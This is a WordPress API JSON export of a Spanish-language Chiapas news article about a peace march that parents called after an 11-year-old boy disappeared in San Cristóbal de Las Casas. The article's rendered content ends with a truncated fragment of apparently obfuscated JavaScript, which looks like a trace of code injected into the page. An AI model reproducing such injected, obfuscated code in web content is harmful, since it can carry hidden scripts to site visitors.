{"id":15267,"date":"2024-04-23T01:05:28","date_gmt":"2024-04-23T01:05:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15267"},"modified":"2024-04-23T01:05:29","modified_gmt":"2024-04-23T01:05:29","slug":"anuncian-marcha-por-la-paz-luego-de-la-desaparicion-de-un-nino-en-la-zona-norte-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15267","title":{"rendered":"Anuncian marcha por la paz, luego de la desaparici\u00f3n de un ni\u00f1o en la zona norte de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020-1024x566.jpg\" alt=\"\" class=\"wp-image-15268\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020-1024x566.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020-300x166.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020-768x424.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020-1536x849.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240422-WA0020.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de abril del 2024. San Crist\u00f3bal de Las Casas.- Padres de familia de la escuela primaria \u201cRosario Castellanos Figueroa\u201d de la colonia Diego de Mazariegos acordaron realizar una marcha por la paz, el pr\u00f3ximo mi\u00e9rcoles 24 de abril, a partir de las 4 de la tarde, para solicitar la aparici\u00f3n con vida del menor desaparecido o secuestrado de nombre Leonel M\u00e9ndez G\u00f3mez de 11 a\u00f1os, en una colonia de la zona norte de San Crist\u00f3bal.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, Joaquin Perez, uno de los representantes dijo que esta marcha es por la paz y de manera pac\u00edfica, \u201cexiguiendo a las autoridades que cumplan con su responsabilidad, la de velar por la seguridad f\u00edsica, corporal y patrimonial, el estado est\u00e1 obligado a garantizar ese dertecho\u201d.<\/p>\n\n\n\n<p>Acordaron marchar con playera blanca y con alg\u00fan globo blanco, para demostrar la paz, adem\u00e1s de invitar a las otras instituciones educativas de la zona norte, a sumarse a esta acci\u00f3n, \u201cya que nadie es ajeno a lo que est\u00e1 sucediendo en la ciudad, por el nivel de violencia que estamos viviendo\u201d.<\/p>\n\n\n\n<p>Esta marcha partir\u00e1 a las 4 de la tarde, partiendo de las afueras de las instalaciones del Centro de la Medicina Maya (CEDEM), enytre la Colonia Morelos y 1ro de Enero, esta segunda donde vivia el menor desaprecido y llevado por la fuerza en un vehiculo Jetta de color negro desde el pasado 20 de abril.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de abril del 2024. San Crist\u00f3bal de Las Casas.- Padres de familia de la escuela primaria \u201cRosario Castellanos Figueroa\u201d de la colonia Diego de Mazariegos acordaron realizar una marcha por la paz, el pr\u00f3ximo mi\u00e9rcoles 24 de abril, a partir de las 4 de la tarde, para solicitar la aparici\u00f3n con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15268,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15267","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15267"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15267\/revisions"}],"predecessor-version":[{"id":15269,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15267\/revisions\/15269"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15268"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}